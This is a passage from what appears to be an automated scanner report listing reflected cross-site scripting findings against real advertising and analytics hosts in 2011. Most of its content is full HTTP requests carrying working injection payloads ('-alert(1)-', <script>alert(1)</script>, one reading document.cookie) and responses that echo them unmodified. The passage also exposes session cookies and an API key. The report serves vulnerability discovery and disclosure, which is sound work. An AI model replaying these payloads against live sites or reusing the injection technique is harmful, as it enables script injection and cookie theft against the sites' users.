Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 485
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277?325d1'-alert(1)-'e054d2cf3d2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.5. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1234'-alert(1)-'50d2c8c77f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadjb1234'-alert(1)-'50d2c8c77f2/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7684
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-71818458_1301681756","http://ad.doubleclick.net/adjb1234'-alert(1)-'50d2c8c77f2/ns.androidtapp/general;net=ns;u=,ns-71818458_1301681756,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43
...[SNIP]...

2.6. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7527'-alert(1)-'fdf3b6f66b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtappd7527'-alert(1)-'fdf3b6f66b/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:57 GMT
Content-Length: 7683
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-36871899_1301681757","http://ad.doubleclick.net/adj/ns.androidtappd7527'-alert(1)-'fdf3b6f66b/general;net=ns;u=,ns-36871899_1301681757,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex
...[SNIP]...

2.7. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2e22'-alert(1)-'3e8eb7d654d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtapp/generale2e22'-alert(1)-'3e8eb7d654d;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7684
Date: Fri, 01 Apr 2011 18:15:57 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-51986405_1301681757","http://ad.doubleclick.net/adj/ns.androidtapp/generale2e22'-alert(1)-'3e8eb7d654d;net=ns;u=,ns-51986405_1301681757,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex.11-ex.6
...[SNIP]...

2.8. http://a.collective-media.net/cmadj/ns.androidtapp/general [ppos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/ns.androidtapp/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d22'-alert(1)-'cdf5b1c5e11 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtapp/general;ppos=10d22'-alert(1)-'cdf5b1c5e11 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7576
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
=ns;u=,ns-41308500_1301681756,11e4f07c0988ac7,none,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex.11-ex.6-bk.jb;;ppos=10d22'-alert(1)-'cdf5b1c5e11;contx=none;dc=w;btg=dx.13;btg=dx.4;btg=dx.1;btg=dx.2;btg=dx.6;btg=dx.12;btg=dx.15;btg=dx.22;btg=dx.26;btg=dx.28;btg=dx.30;btg=dx.31;btg=dx.34;btg=dx.36;btg=dx.5;btg=dx.ch;btg=dx.bi;btg=dx.24;btg=dx.42
...[SNIP]...

2.9. http://ads.adxpose.com/ads/ads.js [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 4b45f<script>alert(1)</script>40dfedbedff was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_2896694b45f<script>alert(1)</script>40dfedbedff HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E90BDFAA65B881BE49A3F4A3B6F17540; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:11:10 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
SE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_2896694b45f<script>alert(1)</script>40dfedbedff".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_2896694b45f<script>
...[SNIP]...

2.10. http://api.ipinfodb.com/v2/ip_query_country.php [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.ipinfodb.com
Path:	/v2/ip_query_country.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d7a63<script>alert(1)</script>e533171dea4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/ip_query_country.php?key=bff296a072906f8d56628b8f4c453c6189ed3da638db5981b97732bb86d0129a&output=json&timezone=false&callback=visitorGeolocation.setGeoCookied7a63<script>alert(1)</script>e533171dea4 HTTP/1.1
Host: api.ipinfodb.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:31:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 176
Content-Type: text/json; charset=UTF-8

visitorGeolocation.setGeoCookied7a63<script>alert(1)</script>e533171dea4(
{
"Ip" : "173.193.214.243",
"Status" : "OK",
"CountryCode" : "US",
"CountryName" : "United States"
}
)

2.11. http://api.ipinfodb.com/v2/ip_query_country.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.ipinfodb.com
Path:	/v2/ip_query_country.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 65179<script>alert(1)</script>2e96d59bfcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/ip_query_country.php?key=bff296a072906f8d56628b8f4c453c6189ed3da638db5981b97732bb86d0129a&output=json&timezone=false&callback=visitorGeolocation.setGeoCo/65179<script>alert(1)</script>2e96d59bfcfokie HTTP/1.1
Host: api.ipinfodb.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:31:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 177
Content-Type: text/json; charset=UTF-8

visitorGeolocation.setGeoCo/65179<script>alert(1)</script>2e96d59bfcfokie(
{
"Ip" : "173.193.214.243",
"Status" : "OK",
"CountryCode" : "US",
"CountryName" : "United States"
}
)

2.12. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload c3faf<script>alert(1)</script>fbf7af21dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7c3faf<script>alert(1)</script>fbf7af21dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:20 GMT
Date: Fri, 01 Apr 2011 18:17:20 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7c3faf<script>alert(1)</script>fbf7af21dea", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.13. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 239b5<script>alert(1)</script>62bdd952f2c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=239b5<script>alert(1)</script>62bdd952f2c&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"239b5<script>alert(1)</script>62bdd952f2c", c16:"", r:""});

2.14. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1cdd<script>alert(1)</script>1daad3d2702 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888b1cdd<script>alert(1)</script>1daad3d2702&c3=2&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888b1cdd<script>alert(1)</script>1daad3d2702", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.15. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c9e4f<script>alert(1)</script>08282fdd351 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2c9e4f<script>alert(1)</script>08282fdd351&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2c9e4f<script>alert(1)</script>08282fdd351", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.16. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ab948<script>alert(1)</script>a35ddd47098 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=ab948<script>alert(1)</script>a35ddd47098&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"ab948<script>alert(1)</script>a35ddd47098", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.17. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload a8c59<script>alert(1)</script>cf2ea45f930 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=a8c59<script>alert(1)</script>cf2ea45f930&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

